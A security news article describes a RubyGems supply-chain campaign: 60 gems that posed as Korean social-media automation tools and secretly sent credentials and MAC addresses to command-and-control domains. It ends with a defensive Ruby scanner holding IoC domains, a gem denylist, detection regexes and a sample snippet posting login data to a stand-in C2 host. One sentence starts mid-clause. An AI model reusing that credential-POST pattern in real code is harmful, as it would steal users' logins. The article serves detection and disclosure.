Socket’s Threat Research Team has exposed a sophisticated supply chain attack targeting the RubyGems ecosystem, where a persistent threat actor deployed 60 malicious packages over 18 months to steal user credentials.
Operating under aliases including zon, nowon, kwonsoonje, and soonje, the attacker distributed infostealer malware disguised as automation tools for popular platforms like Instagram, Twitter/X, TikTok, WordPress, and Telegram since March 2023.
Sophisticated Credential Harvesting Operation
The malicious gems function as fully operational automation tools, delivering their advertised functionality while covertly exfiltrating user credentials to threat actor-controlled infrastructure.

Each package features Korean-language graphical interfaces built with Glimmer-DSL-LibUI, prompting users to enter social media credentials that are immediately transmitted via HTTP POST requests to command-and-control servers including programzon[.]com, appspace[.]kr, and marketingduo[.]co[.]kr.
Technical analysis reveals consistent credential theft behavior across all packages. The malware captures not only usernames and passwords but also MAC addresses for victim fingerprinting and correlation across multiple infections.
The threat actor maintained redundant C2 endpoints throughout the campaign while regularly cycling infrastructure and aliases to evade detection.
The campaign demonstrates remarkable persistence and sophistication. Of the 60 identified malicious gems, 16 remain active on RubyGems under the nowon, kwonsoonje, and soonje accounts.
At the same time, 44 packages published under the zon alias were subsequently yanked but remain accessible through cached mirrors. Collectively, these packages accumulated over 275,000 downloads, though this figure doesn’t directly correlate to compromised systems.
Grey-Hat Marketers Targeted in Strategic Attack
The campaign explicitly targets South Korean grey-hat marketers who rely on disposable identities and automation tools for spam, SEO manipulation, and synthetic engagement operations.

marketingduo[.]co[.]kr as logged-in users, indicating they are registered customers of the service. These systems also show activity on platforms used to acquire fake accounts, followers, views, and related spam infrastructure. This demographic is an ideal fit for the attack vector because they frequently use throwaway social media accounts and are reluctant to report credential theft incidents.
Infostealer logs from compromised systems reveal victims actively using SMM panels, backlink manipulation services, account marketplaces, and proxy rotation tools.
Several malicious gems, including njongto_duo and jongmogtolon, explicitly target financial discussion forums, enabling both bulk posting automation and credential harvesting for potential market manipulation activities.

The njongto_duo RubyGem reveals its dual function as both a stock forum autoposter and an infostealer. The threat actor’s infrastructure directly connects to Korean-language marketing sites advertising identical automation products, suggesting a dual-revenue model combining legitimate tool sales with credential theft.
Socket has reported the campaign to RubyGems security teams and recommends implementing their security tooling, including GitHub App integration, CLI scanning, and browser extensions, to detect malicious packages before installation.
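The behaviour described above (a credential-prompting GUI, a MAC-address lookup, and an HTTP POST to a hard-coded domain, all inside a gem that also does its advertised job) is detectable from source alone. The following is an added example written for this article, not Socket's tooling or the article author's code: a small Ruby pre-install check that matches gem source against the C2 domains named in the report, scores the reported behaviour pattern, and flags a Gemfile.lock that pulls in one of the gem names given on this page. The regex heuristics, the sample source files and the sample lockfile are constructed assumptions for illustration; the gem denylist is limited to names that appear on this page, not the full list of 60.

```ruby
# Assumption: domains are the defanged IoCs from the report, refanged for matching.
C2_DOMAINS = %w[programzon.com appspace.kr marketingduo.co.kr].freeze

# Only gem names that appear on this page; the full list is in Socket's advisory.
KNOWN_MALICIOUS_GEMS = %w[
  njongto_duo jongmogtolon back_duo backlink_zon cafe_basics cafe_basics_duo
].freeze

# Heuristic patterns (assumptions). Each alone is common in benign code; the
# report's behaviour is the combination: POST-out plus MAC lookup plus a login UI.
HTTP_POST_RE = /Net::HTTP\.post(_form)?|\.request_post|\.post\(/
MAC_ADDR_RE  = /Mac\.addr|macaddr|ifconfig|getmac/i
GUI_RE       = /glimmer-dsl-libui|Glimmer::LibUI|window\(/

# Scan one Ruby source string and return a hash of findings.
def scan_gem_source(source)
  findings = {}
  hit_domains = C2_DOMAINS.select { |d| source.include?(d) }
  findings[:c2_domains] = hit_domains unless hit_domains.empty?
  findings[:http_post] = true if source.match?(HTTP_POST_RE)
  findings[:mac_collection] = true if source.match?(MAC_ADDR_RE)
  findings[:credential_prompt] = true if source.match?(/password/i) && source.match?(GUI_RE)
  findings
end

# A known C2 domain is a confirmed IoC; two or more behavioural hits is worth a look.
def verdict(findings)
  return :ioc_match if findings[:c2_domains]
  score = %i[http_post mac_collection credential_prompt].count { |k| findings[k] }
  score >= 2 ? :suspicious : :clean
end

# Top-level specs in a Gemfile.lock are indented exactly four spaces; their
# transitive dependencies are indented six and are skipped here on purpose.
def lockfile_gems(lock_text)
  lock_text.scan(/^ {4}(\S+) \(/).flatten.uniq
end

# Return the subset of locked gems that are on the denylist.
def flag_lockfile(lock_text, denylist = KNOWN_MALICIOUS_GEMS)
  lockfile_gems(lock_text) & denylist
end

# Constructed sample inputs (not real gem code).
SAMPLE_SUSPICIOUS = <<~RUBY
  require 'glimmer-dsl-libui'
  require 'net/http'
  window('Login') { entry { label 'Password' } }
  mac = Mac.addr
  Net::HTTP.post(URI('http://placeholder-c2.example/login'), form.to_json)
RUBY

SAMPLE_BENIGN = <<~RUBY
  require 'net/http'
  body = Net::HTTP.get(URI('https://example.com/feed.json'))
RUBY

SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      rake (13.0.6)
      njongto_duo (0.1.0)
        glimmer-dsl-libui (~> 0.5)
LOCK

if __FILE__ == $PROGRAM_NAME
  puts "suspicious sample: #{verdict(scan_gem_source(SAMPLE_SUSPICIOUS))}"
  puts "benign sample:     #{verdict(scan_gem_source(SAMPLE_BENIGN))}"
  puts "flagged in lock:   #{flag_lockfile(SAMPLE_LOCK).inspect}"
end
```

Run it against unpacked gem sources (`gem unpack <name>` writes them to a directory) before `bundle install`, and keep the denylist and domain list synced with the published IoCs; the behavioural score is a triage aid, not a verdict, because legitimate automation gems also make HTTP requests and draw login windows.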
Malicious Gems — zon Alias
back_duo
backlink_zon
cafe_basics
cafe_basics_duo